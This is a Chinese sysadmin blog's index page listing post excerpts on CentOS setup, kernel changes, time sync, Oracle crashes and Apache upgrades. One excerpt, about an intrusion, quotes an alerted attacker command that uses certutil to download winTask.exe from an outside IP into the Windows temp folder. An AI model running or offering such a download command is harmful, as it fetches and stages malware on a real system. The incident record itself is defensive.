会员
众包
新闻
博问
闪存
赞助商
HarmonyOS
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
Qtong
博客园
首页
新随笔
联系
订阅
管理
2024年9月7日
虚拟机 Centos7 初始化
摘要: 最近需要搞几台虚拟机,之前的vm密码进不去 找了几个方法 不是很贴切, 1. Centos7 忘记密码 重启页面 e--> grub ,在linux16 行 修改ro 为rw,最后加上 init=/bin/sh F10 或Ctrl+x进入 这里的 rw代替 进os之后 mount -o remoun
阅读全文
posted @ 2024-09-07 16:20 Qtong
阅读(103)
评论(0)
推荐(0)
2024年2月3日
Centos升降内核版本
摘要: 内核降级 查看当前yum源中 kernel版本 安装目标内核版本并重启 查看当前内核并卸载旧的内核版本(!!!一定不要卸载当前正在运行的kernel) yum --showduplicates list kernel yum install kernel-3.10.0-1160.71.1.el7 -
阅读全文
posted @ 2024-02-03 13:23 Qtong
阅读(458)
评论(0)
推荐(0)
2024年1月19日
时间同步NTP和chronyc
摘要: chronyc 手动同步 要进行手动同步,可以使用chronyc命令。以下是一些基本的使用方法: 启动chronyd服务:在Linux系统中,可以通过运行systemctl enable chronyd.service和systemctl start chronyd.service来启用并启动c
阅读全文
posted @ 2024-01-19 16:35 Qtong
阅读(2482)
评论(0)
推荐(0)
2022年12月15日
Deployment故障排除
摘要: 
阅读全文
posted @ 2022-12-15 18:29 Qtong
阅读(68)
评论(0)
推荐(0)
2022年12月6日
记录一次物化视图解决视图查询慢问题
摘要: 涉及一个视图优化,记录如下, 会有相应时间的数据延迟。 CREATE MATERIALIZED VIEW PU_VIEW_STOREREQ BUILD IMMEDIATE REFRESH FORCE ON DEMAND START WITH SYSDATE NEXT SYSDATE + 10/144
阅读全文
posted @ 2022-12-06 09:58 Qtong
阅读(398)
评论(0)
推荐(0)
2021年6月6日
一次应用入侵
摘要: 服务器报警 命令行: cmd.exe /c "certutil.exe -urlcache -split -f http://146.196.83.217:29324/winTask.exe C:WindowsTempwinTask.exe" 命令行: C:\Windows\System32\Wbe
阅读全文
posted @ 2021-06-06 18:46 Qtong
阅读(394)
评论(0)
推荐(0)
2021年1月26日
CentOS7,win,mac NAT上网
摘要: 现状 现在内网服务器 有一台可以访问互联网 其他机器不能 想通过snat 让其他服务器也能访问互联网 资源 10.16.14.5 可以上外网 10.16.14.100~200 不能上外网 基础命令[所有服务器] systemctl stop firewalld iptables -F 外网机 ech
阅读全文
posted @ 2021-01-26 10:38 Qtong
阅读(119)
评论(0)
推荐(0)
2020年11月23日
ORA-07445[opiaba()+639],ORA-00600[17147] oracle宕机
摘要: a select sum(bytes)/1024/1024/1024 from dba_segments where owner= '数据用户名' #alert.log Exception [type: SIGSEGV, SI_KERNEL(general_protection)] [ADDR:0x
阅读全文
posted @ 2020-11-23 18:05 Qtong
阅读(738)
评论(0)
推荐(0)
2020年9月21日
nc+was静默部署
摘要: NC部署脚本 #设置was的dmgr目录位置并同步到was cd /nchome/bin && ./wasProfileCmd.sh SET /IBM/WebSphere/AppServer/profiles/Dmgr01 true && ./wasProfileCmd.sh SYNC #生产ejb
阅读全文
posted @ 2020-09-21 09:16 Qtong
阅读(344)
评论(0)
推荐(0)
2020年9月15日
apache安装&升级apache&openssl-Linux
摘要: ##升级 openssl openssl versions yum install -y zlib gcc-c++ gcc wget https://www.openssl.org/source/openssl-1.1.1g.tar.gz && tar -zxvf openssl-1.1.1g.ta
阅读全文
posted @ 2020-09-15 10:20 Qtong
阅读(560)
评论(0)
推荐(0)
下一页
公告